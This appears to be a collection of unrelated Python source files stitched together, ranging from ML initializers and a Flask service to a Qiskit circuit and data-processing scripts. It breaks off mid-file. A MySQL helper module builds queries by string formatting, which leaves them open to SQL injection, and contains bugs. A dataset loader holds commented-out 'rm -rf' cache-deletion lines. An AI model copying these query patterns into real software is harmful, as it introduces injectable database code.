`Understanding the difficulty of training deep feedforward neural networks` - Glorot, X. & Bengio, Y. (2010), using a normal distribution. The resulting tensor will have values sampled from :math:`\mathcal{N}(0, \text{std}^2)` where .. math:: \text{std} = \text{gain} \times \sqrt{\frac{2}{\text{fan_in} + \text{fan_out}}} Also known as 'Glorot initialization'. Args: scale (float, optional): an optional scaling factor used to calculate standard deviation. Defaults 2.0. gain (float, optional): an optional scaling factor. Defaults 1.0. """ # adapted from torch.nn.init def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): assert fan_in is not None, 'Fan_in is not provided.' fan = fan_in if fan_out is not None: fan += fan_out std = gain * math.sqrt(scale / float(fan)) return nn.init.normal_(tensor, 0., std) return initializer def lecun_uniform_(): # adapted from jax.nn.initializers def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): assert fan_in is not None, 'Fan_in is not provided.' var = 1.0 / fan_in bound = math.sqrt(3 * var) return nn.init.uniform_(tensor, -bound, bound) return initializer def lecun_normal_(): # adapted from jax.nn.initializers def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): assert fan_in is not None, 'Fan_in is not provided.' std = math.sqrt(1.0 / fan_in) return nn.init.trunc_normal_(tensor, std=std / .87962566103423978) return initializer
python
#!/usr/bin/python # Filename: mysqlfunc.py # Purpose: All the mysql functions # !!! need to encapsulate a cur with something like a using statement # Database errors import MySQLdb, pdb, logger, dnsCheck from MySQLdb import Error #All the variables for paths from variables import * def create_dbConnection(): try: # trying to create a connection with the proceeding connection a = MySQLdb.connect(user=databaseUser, passwd=databasePasswd, db=databaseName, unix_socket="/opt/lampp/var/mysql/mysql.sock") return a except Error as e: print(e) return None def sqlExeCommit(statem): conn = create_dbConnection() cur = conn.cursor() cur.execute(statem) conn.commit() def sqlCommit(conn): conn.commit() # Only execute def sqlExe(cur, statem): cur.execute(statem) # Execute return def sqlExeRet(statem): conn = create_dbConnection() cur = conn.cursor() cur.execute(statem) return cur.fetchall() def sqlExeRetOne(statem): conn = create_dbConnection() cur = conn.cursor() cur.execute(statem) return cur.fetchone() # Returns the domains based on the domainRangeId def domainsBydomainRangeId(id): conn = create_dbConnection() cur = conn.cursor() statem = "SELECT domainName FROM Domains WHERE domainRangeId = %s"%str(id) cur.execute(statem) results = [] for column in cur.fetchall(): results.append(column[0]) return results # Returns the domains based on the domainRangeId def domainIdsBydomainRangeId(id): conn = create_dbConnection() cur = conn.cursor() statem = "SELECT domainId FROM Domains WHERE domainRangeId = %s"%str(id) cur.execute(statem) results = [] for column in cur.fetchall(): results.append(int(column[0])) return results # Returns the domains based on the domainRangeId def domainNameByDomainId(id): conn = create_dbConnection() cur = conn.cursor() statem = "SELECT domainName FROM Domains WHERE domainId = %s"%str(id) cur.execute(statem) return cur.fetchone()[0] # Return the domainRange value associated with the rangeId def domainRangeByrangeId(cur, id): statem = "SELECT domainRange FROM InScope WHERE domainRangeId = %s"%str(id) cur.execute(statem) return cur.fetchone()[0] # Return all scope Ids def AllScopeIds(self): conn = mysqlfunc.create_dbConnection() cur = conn.cursor() # Saving the programI ScopeIds = [] # Grab all the InScopeIds based on the programName statem = "SELECT domainRangeId FROM InScope" cur.execute(statem) for column in cur.fetchall(): ScopeIds.append(int(column[0])) return ScopeIds #Good for iterates on own commit def insertDomain(domain, domainRangeId): conn = create_dbConnection() cur = conn.cursor() # checkInternet if dnsCheck.checkHostByName(domain): # pdb catch in case something goes wrong # Find ips try: # Insert into Domains statem = "INSERT IGNORE INTO Domains(domainRangeId, domainName, dateFound) VALUES (%s, \"%s\", CURDATE())"%(domainRangeId, domain) cur.execute(statem) print '[+] New Domain:',domain logger.logNewDomain(domain) except Exception,e: print e pdb.set_trace() # Commit conn.commit() def removeDomain(domain): conn = create_dbConnection() cur = conn.cursor() cur.execute('DELETE FROM Domains WHERE domainName like \'%s\''%(domain)) conn.commit() def removeDomainArray(domainArray): conn = create_dbConnection() cur = conn.cursor() for domain in domainArray: cur.execute('DELETE FROM Ips WHERE domainId = (SELECT domainId FROM Domains where domainName = \'%s\')'%(domain)) cur.execute('DELETE FROM Domains WHERE domainName like \'%s\''%(domain)) conn.commit() def returnAllDomains(cur): statem = "SELECT domainName FROM Domains" cur.execute(statem) results = [] for column in cur.fetchall(): results.append(column[0]) return results # Returns an Array of inScope Ids based onthe program # oldName: returnInScopeIds def InScopeIdsByProgramName(program): conn = create_dbConnection() cur = conn.cursor() statem = "SELECT domainRangeId FROM InScope WHERE programId = (SELECT programId FROM Programs WHERE name = \"%s\")"%(program) results = [] cur.execute(statem) for a in cur.fetchall(): results.append(int(a[0])) return results def programNameByProgramId(programId): conn = create_dbConnection() cur = conn.cursor() statem = "SELECT name from Programs WHERE programId = %s"%programId cur.execute(statem) return cur.fetchone()[0] def ProgramIdByProgramName(programName): conn = create_dbConnection() cur = conn.cursor() statem = "SELECT programId from Programs WHERE Programs = %s"%programId cur.execute(statem) return cur.fetchone()[0] def blacklistedByDomainRangeId(cur, id): statem = "SELECT blacklistedContent FROM BlacklistedDomains WHERE domainRangeId = %s"%str(id) cur.execute(statem) results = [] for a in cur.fetchall(): results.append(a[0]) return results
python
#!/usr/bin/env python import functools import os import os.path from datetime import timedelta from functools import update_wrapper from flask import Flask, abort, current_app, jsonify, make_response, request import psycopg2 DATABASE = os.environ['POSTGRES_DB'] USERNAME = os.environ['POSTGRES_USER'] PASSWORD = os.environ['POSTGRES_PASSWORD'] QUERY_FORMAT = """ SELECT elect_div FROM com_elb WHERE ST_Contains(geom, ST_SetSRID(ST_Point({longitude:f}, {latitude:f}), 4283)) """ app = Flask(__name__) if not app.debug: import logging from logging.handlers import RotatingFileHandler logfile = os.path.expanduser('/home/docker/logs/division.log') file_handler = RotatingFileHandler(logfile) file_handler.setLevel(logging.INFO) app.logger.addHandler(file_handler) translation_table = str.maketrans('', '', " -'") def crossdomain(origin=None, methods=None, headers=None, max_age=21600, attach_to_all=True, automatic_options=True): if methods is not None: methods = ', '.join(sorted(x.upper() for x in methods)) if headers is not None and not isinstance(headers, str): headers = ', '.join(x.upper() for x in headers) if not isinstance(origin, str): origin = ', '.join(origin) if isinstance(max_age, timedelta): max_age = max_age.total_seconds() def get_methods(): if methods is not None: return methods options_resp = current_app.make_default_options_response() return options_resp.headers['allow'] def decorator(f): def wrapped_function(*args, **kwargs): if automatic_options and request.method == 'OPTIONS': resp = current_app.make_default_options_response() else: resp = make_response(f(*args, **kwargs)) if not attach_to_all and request.method != 'OPTIONS': return resp h = resp.headers h['Access-Control-Allow-Origin'] = origin h['Access-Control-Allow-Methods'] = get_methods() h['Access-Control-Max-Age'] = str(max_age) if headers is not None: h['Access-Control-Allow-Headers'] = headers return resp f.provide_automatic_options = False return update_wrapper(wrapped_function, f) return decorator @app.route('/division', methods=['GET', 'POST', 'OPTIONS']) @crossdomain(origin='*', headers=['Content-Type', 'X-Requested-With']) def division_lookup(): if request.json is None and request.method == 'POST': abort(400, "Must provide JSON (did you set Content-type?)") elif request.method == 'POST': args = request.json else: args = request.args if 'latitude' not in args: abort(400, "Most provide latitude and longitude") if 'longitude' not in args: abort(400, "Most provide latitude and longitude") conn = psycopg2.connect(host='postgres', database=DATABASE, user=USERNAME, password=PASSWORD) cursor = conn.cursor() cursor.execute(QUERY_FORMAT.format(latitude=float(args['latitude']), longitude=float(args['longitude']))) result = cursor.fetchone() if result is None: name = None else: name = result[0].lower().translate(translation_table) return jsonify({'division': name}) if __name__ == '__main__': app.run(debug=True)
python
from botcity.core import DesktopBot # Uncomment the line below for integrations with BotMaestro # Using the Maestro SDK # from botcity.maestro import * class Bot(DesktopBot): def action(self, execution=None): # Fetch the Activity ID from the task: # task = self.maestro.get_task(execution.task_id) # activity_id = task.activity_id # Opens the BotCity website. self.browse("http://www.botcity.dev") # Uncomment to mark this task as finished on BotMaestro # self.maestro.finish_task( # task_id=execution.task_id, # status=AutomationTaskFinishStatus.SUCCESS, # message="Task Finished OK." # ) def not_found(self, label): print(f"Element not found: {label}") if __name__ == '__main__': Bot.main()
python
import os from ibm_cloud_sdk_core.authenticators import IAMAuthenticator from ibm_watson import PersonalityInsightsV3 from services.base import BaseService, BaseServiceResult class IBMWatson(BaseService): """ IBM Watson service wrapper """ def __init__(self, service_wrapper, service_url): """ Initiate the service engine :param service_wrapper: IBM Watson service engine :type service_wrapper: PersonalityInsightsV3 :param service_url: IBM Watson service URL address :type service_url: str """ super().__init__("ibm", service_url) self.service = service_wrapper def get_personality_scores(self, text_content): """ Get personality scores from textual content :param text_content: Textual data of minimum 100 words :type text_content: str :return: Results from service engine :rtype: dict """ result = self.service.profile( {"contentItems": [{"content": text_content}]}, accept="application/json", raw_scores=True, consumption_preferences=True, ).get_result() return BaseServiceResult(200, result) PERSONALITY_API_KEY = os.getenv("PERSONALITY_API_KEY") PERSONALITY_URL = os.getenv("PERSONALITY_URL") PERSONALITY_ENGINE = PersonalityInsightsV3( version="2017-10-13", authenticator=IAMAuthenticator(apikey=PERSONALITY_API_KEY) ) PERSONALITY_ENGINE.set_service_url(PERSONALITY_URL) IBMWatsonService = IBMWatson(PERSONALITY_ENGINE, PERSONALITY_URL)
python
#!/usr/bin/python3 # creates the SQLite database file - run this first import sqlite3 # create db file con = sqlite3.connect('./db/ic_log1_2020-06-30_manual.db') cur = con.cursor() # create table cur.execute('''CREATE TABLE IF NOT EXISTS iclog (date real, ic integer, note text)''') # close the connection con.close() ''' Legend: date: a UNIX timestamp ic: internet connection boolean true or false, 1 | 0 error: short description of the problem '''
python
# -*- coding: utf-8 -*- def main(): n, m = map(int, input().split()) summed = 4 * n - m xy = list() # 2x + 3y + 4z = M # x + y + z = N を解く # See: # https://atcoder.jp/contests/abc006/submissions/1112016 # WAの原因:成立しない条件の境界値を0以下だと思っていた,2項目の条件に気がつけなかった if summed < 0: print(-1, -1, -1) exit() # xを決め打ち for x in range(summed // 2 + 1): y = summed - 2 * x if y >= 0: xy.append((x, y)) for x, y in xy: z = n - (x + y) if z >= 0: print(x, y, z) exit() print(-1, -1, -1) if __name__ == '__main__': main()
python
#!/usr/bin/env python """ -------------------------------------------------------------------------------- Created: Jackson Lee 7/8/14 This script reads in a fasta or fastq and filters for sequences greater or less than a threshold length Input fastq file @2402:1:1101:1392:2236/2 GATAGTCTTCGGCGCCATCGTCATCCTCTACACCCTCAAGGCGAGCGGCGCGATGGAGACAATCCAGTGGGGCATGCAGCAGGTGACACCGGACTCCCGGATCCA + @@CFFFFFGHHHHIJJIIJIHIJIIIIJIIGEIJJIJJJJJIIIJHFFDDBD8BBD>BCBCCDDDCDCCCDBDDDDDDDDDDD<CDDDDDDDDBBCDDBD<<BDD -------------------------------------------------------------------------------- usage: filter_fasta_by_len.py -i sequence.fasta -g filter_greater_than -l filter_less_than """ #------------------------------------------------------------------------------- #Header - Linkers, Libs, Constants from string import strip from Bio import SeqIO from argparse import ArgumentParser, RawDescriptionHelpFormatter #------------------------------------------------------------------------------- #function declarations def process_and_generate(input_iterator, threshold, greaterflag): """Reusable function that processes a record, then generates each record. input_iterator is an iterator that returns one record at a time process_function is a function that takes one record and does some processing on it """ for rec in input_iterator: if greaterflag: if len(rec.seq) <= threshold: yield rec else: if len(rec.seq) >= threshold: yield rec #------------------------------------------------------------------------------- #Body print "Running..." if __name__ == '__main__': parser = ArgumentParser(usage = "filter_fasta_by_len.py -i sequence.fasta -g filter_greater_than -l filter_less_than", description=__doc__, formatter_class=RawDescriptionHelpFormatter) parser.add_argument("-i", "--input_fastq", action="store", dest="inputfilename", help="fastq file of input sequences") parser.add_argument("-g", "--filter_greater_than", action="store", type=int, dest="greaterthan", help="filter out sequences greater than or equal to \ this size") parser.add_argument("-l", "--filter_less_than", action="store", type=int, dest="lessthan", help="filter out sequences less than or equal this size") options = parser.parse_args() mandatories = ["inputfilename"] for m in mandatories: if not options.__dict__[m]: print "\nError: Missing Arguments\n" parser.print_help() exit(-1) inputfilename = options.inputfilename left, __, right = inputfilename.rpartition('.') fasta =['fa','fasta','faa','fas', 'fna'] fastq =['fq','fastq'] if right in fasta: ext = "fasta" elif right in fastq: ext = "fastq" print "Processing read file: " + inputfilename with open(inputfilename,'U') as infile: parse_iterator = SeqIO.parse(infile, ext) if options.greaterthan == None and options.lessthan == None: print "\nError: Missing Comparison Value\n" parser.print_help() exit(-1) elif options.greaterthan == None and options.lessthan != None: lessthan = options.lessthan print "and filtering out sequences less than ", lessthan outputfilename = left + '.filtered.lessthan.' + str(lessthan) + "." + right with open(outputfilename, 'w') as outfile: record_generator = process_and_generate(parse_iterator, lessthan, False) SeqIO.write(record_generator, outfile, ext) elif options.greaterthan != None and options.lessthan == None: greaterthan = options.greaterthan print "and filtering out sequences greater than ", greaterthan outputfilename = left + '.filtered.greaterthan.' + str(greaterthan) + "." + right with open(outputfilename, 'w') as outfile: record_generator = process_and_generate(parse_iterator, greaterthan, True) SeqIO.write(record_generator, outfile, ext) elif options.greaterthan != None and options.lessthan != None: greaterthan = options.greaterthan lessthan = options.lessthan print "and filtering out sequences less than ", lessthan, " and greater than ", greaterthan outputfilename = left + '.filtered.greaterthan.' + str(greaterthan) + ".filtered.lessthan." + str(lessthan) + '.' + right with open(outputfilename, 'w') as outfile: pre_record_generator = process_and_generate(parse_iterator, greaterthan, True) record_generator = process_and_generate(pre_record_generator, lessthan, False) SeqIO.write(record_generator, outfile, ext) print "Done!"
python
import numpy as np from os import listdir from os.path import join #def random_shift_events(events, max_shift=20, resolution=(180, 240)): def random_shift_events(events, f, max_shift=20, resolution=(195, 346)): H, W = resolution x_shift, y_shift = np.random.randint(-max_shift, max_shift+1, size=(2,)) #print('rm -rf ~/cachefs/erl/' + f) #print(events.shape) #print(events[:,0]) #print(events[:,1]) events[:,0] += x_shift events[:,1] += y_shift valid_events = (events[:,0] >= 0) & (events[:,0] < W) & (events[:,1] >= 0) & (events[:,1] < H) events = events[valid_events] return events #def random_flip_events_along_x(events, resolution=(180, 240), p=0.5): def random_flip_events_along_x(events, resolution=(195, 346), p=0.5): H, W = resolution if np.random.random() < p: events[:,0] = W - 1 - events[:,0] return events class NCaltech101: def __init__(self, root, augmentation=False): self.classes = listdir(root) self.files = [] self.labels = [] self.augmentation = augmentation for i, c in enumerate(self.classes): new_files = [join(root, c, f) for f in listdir(join(root, c))] self.files += new_files self.labels += [i] * len(new_files) def __len__(self): return len(self.files) def __getitem__(self, idx): """ returns events and label, loading events from aedat :param idx: :return: x,y,t,p, label """ label = self.labels[idx] f = self.files[idx] #print('rm -rf ~/cachefs/erl/' + f) events = np.load(f).astype(np.float32) if self.augmentation: events = random_shift_events(events, f) events = random_flip_events_along_x(events) return events, label
python
import json import cryptography.fernet from django.conf import settings from django.utils.encoding import force_bytes, force_text from django_pgjson.fields import get_encoder_class import six # Allow the use of key rotation if isinstance(settings.FIELD_ENCRYPTION_KEY, (tuple, list)): keys = [ cryptography.fernet.Fernet(k) for k in settings.FIELD_ENCRYPTION_KEY ] elif isinstance(settings.FIELD_ENCRYPTION_KEY, dict): # allow the keys to be indexed in a dictionary keys = [ cryptography.fernet.Fernet(k) for k in settings.FIELD_ENCRYPTION_KEY.values() ] else: # else turn the single key into a list of one keys = [cryptography.fernet.Fernet(settings.FIELD_ENCRYPTION_KEY), ] crypter = cryptography.fernet.MultiFernet(keys) def no_op_encrypt_values(data, encrypter=None, skip_keys=None): """ A noop function with the same call signature of `encrypt_values`. Returns: obj - returns the data parameter unaltered. """ return data def pick_encrypter(key, keys, encrypter): """ Returns encrypting function. To facilitate skipping keys during encryption we need to pick between the encrypting function or a noop funciton. Returns: function """ if key in keys: return no_op_encrypt_values return encrypter def encrypt_values(data, encrypter=None, skip_keys=None): """ Returns data with values it contains recursively encrypted. Note that this will use `json.dumps` to convert the data to a string type. The encoder class will be the value of `PGJSON_ENCODER_CLASS` in the settings or `django.core.serializers.json.DjangoJSONEncoder`. Arguments: data (object): the data to decrypt. encrypter (function): the decryption function to use. If not specified it will use the cryptography.fernet.MultiFernetMultiFernet.encrypt method with the keys being taken from settings.FIELD_ENCRYPTION_KEY skip_keys (list[str]): a list of keys that should not be encrypted Returns: object """ if skip_keys is None: skip_keys = [] encrypter = encrypter or crypter.encrypt if isinstance(data, (list, tuple, set)): return [encrypt_values(x, encrypter, skip_keys) for x in data] if isinstance(data, dict): return { key: pick_encrypter(key, skip_keys, encrypt_values)( value, encrypter, skip_keys) for key, value in six.iteritems(data) } if isinstance(data, six.string_types): return force_text(encrypter(data.encode('unicode_escape'))) return force_text(encrypter( force_bytes(json.dumps(data, cls=get_encoder_class())) )) def decrypt_values(data, decrypter=None): """ Returns data with values it contains recursively decrypted. Note that this will use `json.loads` to convert the decrypted data to its most likely python type. Arguments: data (object): the data to decrypt. decrypter (function): the decryption function to use. If not specified it will use the cryptography.fernet.MultiFernetMultiFernet.decrypt method with the keys being taken from settings.FIELD_ENCRYPTION_KEY Returns: object """ decrypter = decrypter or crypter.decrypt if isinstance(data, (list, tuple, set)): return [decrypt_values(x, decrypter) for x in data] if isinstance(data, dict): return { key: decrypt_values(value, decrypter) for key, value in six.iteritems(data) } if isinstance(data, six.string_types): # string data! if we got a string or unicode convert it to # bytes first, as per http://stackoverflow.com/a/11174804. # # Note 1: This is required for the decrypter, it only accepts bytes. # Note 2: this is primarily needed because the decrypt method is called # on the value during the save as well as during the read, by the # django ORM. data = data.encode('unicode_escape') try: # decrypt the bytes data value = decrypter(data) except TypeError: # Not bytes data??! probably from a django field calling # to_python during value assignment value = data except cryptography.fernet.InvalidToken: # Either the data is corrupted, e.g. a lost key or the data # was never encrypted, this could be from django calling to_python # during value assignment. value = data try: # undo the unicode mess from earlier value = value.decode('unicode_escape') except AttributeError: pass try: return json.loads(value) except (ValueError, TypeError): # Not valid json, just return the value return value
python
from pptx import Presentation from pptx.util import Inches import pyexcel as pe print(""" Exemplo de criação de apresentação PPTX em loop utilizando dados de Excel Vish, o bagulho foi loko pra conseguir criar este aplicativo mano -> agora aprendi, já era Day 24 Code Python - 23/05/2018 """) dadosExcel = pe.iget_records(file_name="apresentacao_automatica.xlsx") # tentar criar uma função prs = Presentation() # se for ler um PPTX, passar como parâmetro title_only_slide_layout = prs.slide_layouts[5] slide = prs.slides.add_slide(title_only_slide_layout) shapes = slide.shapes shapes.title.text = 'Idades -> Feito com Python' # configuração de colunas e celulas --> ainda preciso descobrir como automatizar estes tamanhos porque o bagulho tá loko rows = 5 cols = 2 left = top = Inches(2.0) width = Inches(6.0) height = Inches(0.8) table = shapes.add_table(rows, cols, left, top, width, height).table # tamanho das colunas table.columns[0].width = Inches(3.0) table.columns[1].width = Inches(2.0) # nome das colunas - fixo na posição 0 table.cell(0, 0).text = 'Nome' table.cell(0, 1).text = 'Idade' nome = [] idade = [] cont = 1 for itens in dadosExcel: # escrevendo os dados na células if cont > 0: # o 0 sempre será o header, e este é fixo. table.cell(cont, 0).text = str(itens['nome']) table.cell(cont, 1).text = str(itens['idade']) cont += 1 # liberando o recurso, iiirraaaaa pe.free_resources() # salvando o arquivo pptx prs.save('apresentacao_tabela_automatica.pptx') print('-' * 34) print('APRESENTAÇÃO CRIADA COM SUCESSO.')
python
""" This sample shows how to create a list in json of all items in a group Python 2.x/3.x ArcREST 3.5,6 """ from __future__ import print_function from __future__ import absolute_import import arcrest import os import json from arcresthelper import orgtools, common import csv import sys from arcresthelper.packages import six def trace(): """ trace finds the line, the filename and error message and returns it to the user """ import traceback, inspect,sys tb = sys.exc_info()[2] tbinfo = traceback.format_tb(tb)[0] filename = inspect.getfile(inspect.currentframe()) # script name + line number line = tbinfo.split(", ")[1] # Get Python syntax error # synerror = traceback.format_exc().splitlines()[-1] return line, filename, synerror def _unicode_convert(obj): """ converts unicode to anscii """ if isinstance(obj, dict): return {_unicode_convert(key): _unicode_convert(value) for key, value in obj.items()} elif isinstance(obj, list): return [_unicode_convert(element) for element in obj] elif isinstance(obj, str): return obj elif isinstance(obj, six.text_type): return obj.encode('utf-8') elif isinstance(obj, six.integer_types): return obj else: return obj if __name__ == "__main__": proxy_port = None proxy_url = None securityinfo = {} securityinfo['security_type'] = 'Portal'#LDAP, NTLM, OAuth, Portal, PKI securityinfo['username'] = ""#<UserName> securityinfo['password'] = ""#<Password> securityinfo['org_url'] = "http://www.arcgis.com" securityinfo['proxy_url'] = proxy_url securityinfo['proxy_port'] = proxy_port securityinfo['referer_url'] = None securityinfo['token_url'] = None securityinfo['certificatefile'] = None securityinfo['keyfile'] = None securityinfo['client_id'] = None securityinfo['secret_id'] = None groups = ["Demographic Content"] #Name of groups outputlocation = r"C:\TEMP" outputfilename = "group.json" outputitemID = "id.csv" try: orgt = orgtools.orgtools(securityinfo) groupRes = [] if orgt.valid: fileName = os.path.join(outputlocation,outputfilename) csvFile = os.path.join(outputlocation,outputitemID) iconPath = os.path.join(outputlocation,"icons") if not os.path.exists(iconPath): os.makedirs(iconPath) if sys.version_info[0] == 2: access = 'wb+' kwargs = {} else: access = 'wt+' kwargs = {'newline':''} file = open(fileName, "w") with open(fileName, access, **kwargs) as csvFile: idwriter = csv.writer(csvFile) for groupName in groups: results = orgt.getGroupContent(groupName=groupName, onlyInOrg=True, onlyInUser=True) if not results is None: for result in results: idwriter.writerow([result['title'],result['id']]) thumbLocal = orgt.getThumbnailForItem(itemId=result['id'], fileName=result['title'], filePath=iconPath) result['thumbnail']=thumbLocal groupRes.append(result) if len(groupRes) > 0: print ("%s items found" % str(len(groupRes))) groupRes = _unicode_convert(groupRes) file.write(json.dumps(groupRes, ensure_ascii=False, sort_keys=True, indent=4, separators=(',', ': '))) file.close() except (common.ArcRestHelperError) as e: print ("error in function: %s" % e[0]['function']) print ("error on line: %s" % e[0]['line']) print ("error in file name: %s" % e[0]['filename']) print ("with error message: %s" % e[0]['synerror']) if 'arcpyError' in e[0]: print ("with arcpy message: %s" % e[0]['arcpyError']) except: line, filename, synerror = trace() print ("error on line: %s" % line) print ("error in file name: %s" % filename) print ("with error message: %s" % synerror)
python
def get_customized_mapping(cls): mapping = { "name": { "type": "text", "copy_to": [ "all" ] }, "is_public": { "type": "boolean" }, "taxid": { "type": "integer" }, "genes": { "properties": { "mygene_id": { "normalizer": "keyword_lowercase_normalizer", "type": "keyword" }, "symbol": { "normalizer": "keyword_lowercase_normalizer", "type": "keyword" }, "ncbigene": { "normalizer": "keyword_lowercase_normalizer", "type": "keyword" }, "ensemblgene": { "normalizer": "keyword_lowercase_normalizer", "type": "keyword" }, "uniprot": { "normalizer": "keyword_lowercase_normalizer", "type": "keyword" }, "name": { "type": "text" } } }, "reactome": { "properties": { "id": { "normalizer": "keyword_lowercase_normalizer", "type": "keyword", "copy_to": [ "all" ] }, "geneset_name": { "type": "text" } } } } return mapping
python
#!/usr/bin/env python # # Copyright (C) 2007 British Broadcasting Corporation and Kamaelia Contributors(1) # All Rights Reserved. # # You may only modify and redistribute this under the terms of any of the # following licenses(2): Mozilla Public License, V1.1, GNU General # Public License, V2.0, GNU Lesser General Public License, V2.1 # # (1) Kamaelia Contributors are listed in the AUTHORS file and at # http://kamaelia.sourceforge.net/AUTHORS - please extend this file, # not this notice. # (2) Reproduced in the COPYING file, and at: # http://kamaelia.sourceforge.net/COPYING # Under section 3.5 of the MPL, we are using this text since we deem the MPL # notice inappropriate for this file. As per MPL/GPL/LGPL removal of this # notice is prohibited. # # Please contact us via: [email protected] # to discuss alternative licensing. # ------------------------------------------------------------------------- # from Kamaelia.UI.Pygame.Button import Button from Kamaelia.Chassis.Graphline import Graphline colours = { "black" : (0,0,0), "red" : (192,0,0), "orange" : (192,96,0), "yellow" : (160,160,0), "green" : (0,192,0), "turquoise" : (0,160,160), "blue": (0,0,255), "purple" : (192,0,192), "darkgrey" : (96,96,96), "lightgrey" :(192,192,192), } def buildPalette(cols, order, topleft=(0,0), size=32): buttons = {} links = {} pos = topleft i=0 # Interesting/neat trick MPS for col in order: buttons[col] = Button(caption="", position=pos, size=(size,size), bgcolour=cols[col], msg=cols[col]) links[ (col,"outbox") ] = ("self","outbox") pos = (pos[0] + size, pos[1]) i=i+1 return Graphline( linkages = links, **buttons )
python
#!/usr/bin/env python from qiskit import QuantumProgram Circuit = 'oneBitFullAdderCircuit' # Create the quantum program qp = QuantumProgram() # Creating registers n_qubits = 5 qr = qp.create_quantum_register("qr", n_qubits) cr = qp.create_classical_register("cr", n_qubits) # One-bit full adder circuit, where: # qr[0], qr[1] are the bits to add # qr[2] is the carry_in # qr[3] is the result # qr[4] is the carry_out obc = qp.create_circuit(Circuit, [qr], [cr]) # Prepare bits to add obc.h(qr[0]) obc.h(qr[1]) obc.h(qr[2]) # The result in qr[3] obc.cx(qr[0], qr[3]) obc.cx(qr[1], qr[3]) obc.cx(qr[2], qr[3]) # The carry_out in qr[4] obc.ccx(qr[0], qr[1], qr[4]) obc.ccx(qr[0], qr[2], qr[4]) obc.ccx(qr[1], qr[2], qr[4]) # Measure for i in range(0, n_qubits): obc.measure(qr[i], cr[i]) # Get qasm source source = qp.get_qasm(Circuit) print(source) # Compile and run backend = 'local_qasm_simulator' circuits = [Circuit] # Group of circuits to execute qobj = qp.compile(circuits, backend) # Compile your program result = qp.run(qobj, wait=2, timeout=240) print(result) print(result.get_counts(Circuit))
python
"""add degree denormalizations Revision ID: 38c7982f4160 Revises: 59d7b4f94cdf Create Date: 2014-09-11 20:32:37.987989 """ # revision identifiers, used by Alembic. revision = '38c7982f4160' down_revision = '59d7b4f94cdf' from alembic import op import sqlalchemy as sa def upgrade(): op.add_column(u'grano_entity', sa.Column('degree_in', sa.Integer(), nullable=True)) op.add_column(u'grano_entity', sa.Column('degree_out', sa.Integer(), nullable=True)) op.add_column(u'grano_entity', sa.Column('degree', sa.Integer(), nullable=True)) def downgrade(): op.drop_column(u'grano_entity', 'degree_out') op.drop_column(u'grano_entity', 'degree_in') op.drop_column(u'grano_entity', 'degree')
python
from protodata.serialization_ops import SerializeSettings from protodata.reading_ops import DataSettings from protodata.utils import create_dir from protodata.data_ops import NumericColumn, split_data, feature_normalize, \ map_feature_type, float64_feature, int64_feature import tensorflow as tf import pandas as pd import numpy as np import os import logging from six.moves import urllib DATA_FILE_NAME = 'sonar.npy' DATA_URL = 'https://archive.ics.uci.edu/ml/machine-learning-databases/undocumented/connectionist-bench/sonar/sonar.all-data' # noqa logger = logging.getLogger(__name__) class SonarSerialize(SerializeSettings): def __init__(self, data_path): """ See base class """ super(SonarSerialize, self).__init__(data_path) create_dir(data_path) # On-demand download if it does not exist if not is_downloaded(data_path): logger.info('Downloading Sonar dataset ...') urllib.request.urlretrieve(DATA_URL, get_data_path(data_path)) def read(self): self.data = pd.read_csv(get_data_path(self.data_path), header=None) self.features = self.data.loc[:, self.data.columns.values[:-1]] self.labels = self.data.loc[:, self.data.columns.values[-1]] # Map rock (R) to 0 and mine (M) to 1 self.labels[self.labels == 'M'] = 1 self.labels[self.labels == 'R'] = 0 def get_validation_indices(self, train_ratio, val_ratio): """ Separates data into training, validation and test and normalizes the columns by using z-scores """ train, val, test = split_data(self.features.shape[0], train_ratio, val_ratio) # Store normalization info self.feature_norm = self._normalize_features(train, val) return train, val, test def _normalize_features(self, train_idx, val_idx): training = np.concatenate([train_idx, val_idx]) mean_c, std_c, min_c, max_c = \ feature_normalize(self.features.iloc[training, :]) self.features = (self.features - mean_c) / std_c # Store normalization info return {'mean': mean_c, 'std': std_c, 'min': min_c, 'max_c': max_c} def get_options(self): options = {'feature_normalization': self.feature_norm} return options def define_columns(self): cols = [] # Columns for i in range(self.features.shape[1]): current_col = NumericColumn( name=str(i), type=map_feature_type(np.dtype('float')) ) cols.append(current_col) # Label cols.append(NumericColumn( name='class', type=map_feature_type(np.dtype('int')) )) return cols def build_examples(self, index): row = self.features.iloc[index, :] feature_dict = {} for i in range(self.features.shape[1]): feature_dict.update( {str(i): float64_feature(row.iloc[i])} ) class_value = int(self.labels.iloc[index]) feature_dict.update({'class': int64_feature(class_value)}) return [tf.train.Example(features=tf.train.Features(feature=feature_dict))] # noqa class SonarSettings(DataSettings): def __init__(self, dataset_location, image_specs=None, embedding_dimensions=32, quantizer=None): super(SonarSettings, self).__init__( dataset_location=dataset_location, image_specs=image_specs, embedding_dimensions=embedding_dimensions, quantizer=quantizer) def tag(self): return 'sonar' def size_per_instance(self): return 0.5 def target_class(self): return 'class' def _target_type(self): return tf.int32 def _get_num_classes(self): return 2 def select_wide_cols(self): return [v.to_column() for k, v in self.columns.items()] def select_deep_cols(self): return RuntimeError('No embeddings in this dataset') def is_downloaded(folder): """ Returns whether data has been downloaded """ return os.path.isfile(get_data_path(folder)) def get_data_path(folder): return os.path.join(folder, DATA_FILE_NAME)
python
#!/usr/bin/env python # -*- coding: utf-8 -*- """argparse and main entry point script""" import argparse import logging import os import sys from logging.handlers import TimedRotatingFileHandler from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker import kootkounter.bot LOG_LEVEL_STRINGS = ["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG"] def log_level(log_level_string: str): """Argparse type function for determining the specified logging level""" if log_level_string not in LOG_LEVEL_STRINGS: raise argparse.ArgumentTypeError( "invalid choice: {} (choose from {})".format( log_level_string, LOG_LEVEL_STRINGS ) ) return getattr(logging, log_level_string, logging.INFO) def add_log_parser(parser): """Add logging options to the argument parser""" group = parser.add_argument_group(title="Logging") group.add_argument("--log-level", dest="log_level", default="INFO", type=log_level, help="Set the logging output level") group.add_argument("--log-dir", dest="log_dir", help="Enable TimeRotatingLogging at the directory " "specified") group.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging") def init_logging(args, log_file_path): """Intake a argparse.parse_args() object and setup python logging""" # configure logging handlers_ = [] log_format = logging.Formatter(fmt="[%(asctime)s] [%(levelname)s] - %(message)s") if args.log_dir: os.makedirs(args.log_dir, 